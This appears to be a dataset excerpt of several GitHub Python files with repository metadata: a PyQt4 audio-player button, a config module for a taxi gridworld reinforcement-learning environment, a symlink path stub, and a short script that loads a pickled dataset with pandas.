e638b1d00233c87a48c3c55753d3e01f901c123f
|
d4aedaaa05d754ddf68c586a224443968efbc6dd
|
refs/heads/master
| 2016-08-06T13:03:55.980854
| 2013-06-23T16:52:42
| 2013-06-23T16:52:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,501
|
py
|
__author__ = 'MasterX2'
from PyQt4 import QtGui, QtCore
from PyQt4.phonon import Phonon
class Window(QtGui.QPushButton):
def __init__(self):
QtGui.QPushButton.__init__(self, 'Choose File')
self.mediaObject = Phonon.MediaObject(self)
self.audioOutput = Phonon.AudioOutput(Phonon.MusicCategory, self)
Phonon.createPath(self.mediaObject, self.audioOutput)
self.mediaObject.stateChanged.connect(self.handleStateChanged)
self.clicked.connect(self.handleButton)
def handleButton(self):
if self.mediaObject.state() == Phonon.PlayingState:
self.mediaObject.stop()
else:
path = QtGui.QFileDialog.getOpenFileName(self, self.text())
if path:
self.mediaObject.setCurrentSource(Phonon.MediaSource(path))
self.mediaObject.play()
def handleStateChanged(self, newstate, oldstate):
if newstate == Phonon.PlayingState:
self.setText('Stop')
elif newstate == Phonon.StoppedState:
self.setText('Choose File')
elif newstate == Phonon.ErrorState:
source = self.mediaObject.currentSource().fileName()
print 'ERROR: could not play:', source.toLocal8Bit().data()
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
app.setApplicationName('Phonon')
win = Window()
win.resize(200, 100)
win.show()
sys.exit(app.exec_())
|
[
"true.masterx@gmail.com"
] |
true.masterx@gmail.com
|
7199f038ea4f16a7389261bd5f9003a535c2f491
|
1892a473b7eed6aaa712bc2959a1aca48beec284
|
/domains/gym_taxi/utils/config.py
|
afa1e60798fc34e0d28312b85cf4f1ba3ae3c071
|
[
"MIT"
] |
permissive
|
AndrewPaulChester/sage-code
|
d3753bc894f21ce057c1a273e54926e368529e2b
|
9fe676bfbcbc6f642eca29b30a1027fba2a426a0
|
refs/heads/main
| 2023-05-05T19:08:21.655463
| 2021-05-27T05:21:54
| 2021-05-27T05:21:54
| 371,245,286
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,501
|
py
|
"""
.. module:: config
:synopsis: Contains config parameters for the SDRL taxi world.
"""
import numpy as np
from numpy.random import randint as rand
import matplotlib.pyplot as pyplot
MAX_EPISODE_LENGTH = 500
DISCRETE_ENVIRONMENT_STATES = 500
FIXED_GRID_SIZE = 5
LOCS = [(0, 0), (4, 0), (0, 4), (3, 4)]
MAP = [
"+---------+",
"|R: | : :G|",
"| : : : : |",
"| : : : : |",
"| | : | : |",
"|Y| : |B: |",
"+---------+",
]
MISSING_EDGES = [
((1, 0), (2, 0)),
((0, 3), (1, 3)),
((0, 4), (1, 4)),
((2, 3), (3, 3)),
((2, 4), (3, 4)),
]
OPEN = {
"size": FIXED_GRID_SIZE,
"wall_locations": [],
"passenger_destinations": LOCS,
"passenger_locations": LOCS,
"delivery_limit": 1,
"concurrent_passengers": 1,
"timeout": MAX_EPISODE_LENGTH,
"random_walls": False,
}
ORIGINAL = {
"size": FIXED_GRID_SIZE,
"wall_locations": MISSING_EDGES,
"passenger_destinations": LOCS,
"passenger_locations": LOCS,
"delivery_limit": 1,
"concurrent_passengers": 1,
"timeout": MAX_EPISODE_LENGTH,
"random_walls": False,
}
EXPANDED = {
"size": 20,
"delivery_limit": 1,
"concurrent_passengers": 1,
"timeout": MAX_EPISODE_LENGTH,
"passenger_creation_probability": 1,
"random_walls": True,
}
MULTI = {
"size": 20,
"delivery_limit": 100,
"concurrent_passengers": 5,
"timeout": MAX_EPISODE_LENGTH,
"passenger_creation_probability": 0.05,
"random_walls": True,
}
PREDICTABLE = {
"size": 20,
"delivery_limit": 100,
"concurrent_passengers": 1,
"timeout": 2000,
"passenger_creation_probability": 0.04,
"random_walls": True,
"passenger_locations": [
(0, 0),
(0, 1),
(0, 2),
(1, 0),
(1, 1),
(1, 2),
(2, 0),
(2, 1),
(2, 2),
],
"passenger_destinations": [
(17, 17),
(17, 18),
(17, 19),
(18, 17),
(18, 18),
(18, 19),
(19, 17),
(19, 18),
(19, 19),
],
}
PREDICTABLE15 = {
"size": 15,
"delivery_limit": 100,
"concurrent_passengers": 1,
"timeout": 2000,
"passenger_creation_probability": 0.06,
"random_walls": True,
"passenger_locations": [
(0, 0),
(0, 1),
(0, 2),
(1, 0),
(1, 1),
(1, 2),
(2, 0),
(2, 1),
(2, 2),
],
"passenger_destinations": [
(12, 12),
(12, 13),
(12, 14),
(13, 12),
(13, 13),
(13, 14),
(14, 12),
(14, 13),
(14, 14),
],
}
PREDICTABLE10 = {
"size": 10,
"delivery_limit": 100,
"concurrent_passengers": 1,
"timeout": 2000,
"passenger_creation_probability": 0.08,
"random_walls": True,
"passenger_locations": [(0, 0), (0, 1), (1, 0), (1, 1)],
"passenger_destinations": [(8, 8), (8, 9), (9, 8), (9, 9)],
}
PREDICTABLE5 = {
"size": 5,
"delivery_limit": 100,
"wall_locations": MISSING_EDGES,
"concurrent_passengers": 1,
"timeout": 1000,
"passenger_creation_probability": 0.12,
"random_walls": False,
"passenger_locations": [(0, 0), (0, 1), (1, 0), (1, 1)],
"passenger_destinations": [(3, 3), (3, 4), (4, 3), (4, 4)],
}
FUEL = {
"size": 20,
"delivery_limit": 100,
"concurrent_passengers": 5,
"timeout": MAX_EPISODE_LENGTH,
"passenger_creation_probability": 0.05,
"random_walls": True,
"fuel_use": 1,
}
|
[
"48459485+AndrewPaulChester@users.noreply.github.com"
] |
48459485+AndrewPaulChester@users.noreply.github.com
|
328bccf4b3138a2c108c76e34c1341d685b88b08
|
7e2af9fa47719462a238693c26ac9c872749c58c
|
/Environments/project1_env/lib/python3.6/linecache.py
|
5aed931c8d3afc86198b3c5b70a44b3aa147d47a
|
[] |
no_license
|
williamsonchris/Udacity
|
b0a169f6a02f5897cd810de51f7e4657ccc29b17
|
4c947484f096fff2d8a5916145d3288b461efe25
|
refs/heads/master
| 2020-03-30T08:45:44.107299
| 2018-10-02T05:14:20
| 2018-10-02T05:14:20
| 151,037,529
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46
|
py
|
/Users/CW/anaconda3/lib/python3.6/linecache.py
|
[
"CW@Chris-Williamson-2.local"
] |
CW@Chris-Williamson-2.local
|
bd6651931aed58d7bfd2c1949c7dea3b99edfd6c
|
b685036280331fa50fcd87f269521342ec1b437b
|
/src/data_mining_demo/py_shuJuWaJue_ruMen_yu_ShiJian/chapter3/demo2.py
|
7e2ee679470b22f9af507b2f12f77a6431309659
|
[] |
no_license
|
chenqing666/myML_DM_Test
|
f875cb5b2a92e81bc3de2a0070c0185b7eacac89
|
5ac38f7872d94ca7cedd4f5057bb93732b5edbad
|
refs/heads/master
| 2022-02-26T01:52:06.293025
| 2019-09-20T06:35:25
| 2019-09-20T06:35:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
import pickle
import numpy as np
import pandas as pd
datafile = "./cleanedData.dai"
with open(datafile, 'rb') as file:
dataset = pickle.load(file)
print(dataset.head())
|
[
"daijitao@ctsi.com.cn"
] |
daijitao@ctsi.com.cn
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.